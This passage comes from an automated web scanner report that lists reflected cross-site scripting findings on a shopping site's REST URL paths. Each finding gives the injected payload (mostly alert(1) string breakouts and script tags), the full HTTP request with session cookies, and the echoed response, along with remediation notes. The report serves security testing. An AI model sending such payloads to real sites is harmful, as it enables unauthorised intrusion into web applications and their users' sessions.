User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:38:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/235690923/Health-Products/777e77b'-alert(1)-'535dd4f02cb';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.883. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Liquor-Store/70

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7add'-alert(1)-'b84110bf729 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppinge7add'-alert(1)-'b84110bf729/Consumer-Goods/235690923/Liquor-Store/70 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:22:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shoppinge7add'-alert(1)-'b84110bf729/Consumer-Goods/235690923/Liquor-Store/70';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.884. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Liquor-Store/70

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d6e3"><a>13e96ed43f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping5d6e3"><a>13e96ed43f8/Consumer-Goods/235690923/Liquor-Store/70 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:12:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping5d6e3"><a>13e96ed43f8">
...[SNIP]...

4.885. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Liquor-Store/70

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac70a'-alert(1)-'2fe708cbd50 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goodsac70a'-alert(1)-'2fe708cbd50/235690923/Liquor-Store/70 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:25:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goodsac70a'-alert(1)-'2fe708cbd50/235690923/Liquor-Store/70';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.886. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Liquor-Store/70

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b3717<script>alert(1)</script>faa87e74d2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goodsb3717<script>alert(1)</script>faa87e74d2a/235690923/Liquor-Store/70 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:25:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goodsb3717<script>alert(1)</script>faa87e74d2a <a href="#" id="backlink">
...[SNIP]...

4.887. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Liquor-Store/70

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 253e6'-alert(1)-'f69723ef75e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923253e6'-alert(1)-'f69723ef75e/Liquor-Store/70 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:29:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods/235690923253e6'-alert(1)-'f69723ef75e/Liquor-Store/70';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.888. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Liquor-Store/70

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload debf9'-alert(1)-'828a52ae0b3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Liquor-Storedebf9'-alert(1)-'828a52ae0b3/70 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:38:14 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goods/235690923/Liquor-Storedebf9'-alert(1)-'828a52ae0b3/70';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.889. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Liquor-Store/70

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e3e8'-alert(1)-'e3082307355 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923/Liquor-Store/705e3e8'-alert(1)-'e3082307355 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:46:17 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/235690923/Liquor-Store/705e3e8'-alert(1)-'e3082307355';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.890. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Luggage/41

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61333'-alert(1)-'7083acee0d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping61333'-alert(1)-'7083acee0d4/Consumer-Goods/235690923/Luggage/41 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:35:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping61333'-alert(1)-'7083acee0d4/Consumer-Goods/235690923/Luggage/41';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.891. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Luggage/41

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed5bc"><a>da4cf3e9fd8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppinged5bc"><a>da4cf3e9fd8/Consumer-Goods/235690923/Luggage/41 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:26:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppinged5bc"><a>da4cf3e9fd8">
...[SNIP]...

4.892. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Luggage/41

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 17e21<script>alert(1)</script>d27d41f48fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goods17e21<script>alert(1)</script>d27d41f48fd/235690923/Luggage/41 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:42:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goods17e21<script>alert(1)</script>d27d41f48fd <a href="#" id="backlink">
...[SNIP]...

4.893. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Luggage/41

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77a8b'-alert(1)-'9a4c016a8d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods77a8b'-alert(1)-'9a4c016a8d1/235690923/Luggage/41 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:42:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Consumer-Goods77a8b'-alert(1)-'9a4c016a8d1/235690923/Luggage/41';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.894. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Luggage/41

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddd07'-alert(1)-'1611398788c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Consumer-Goods/235690923ddd07'-alert(1)-'1611398788c/Luggage/41 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods/235690923ddd07'-alert(1)-'1611398788c/Luggage/41';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.895. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Luggage/41

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 566a8'-alert(1)-'2f530c60795 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

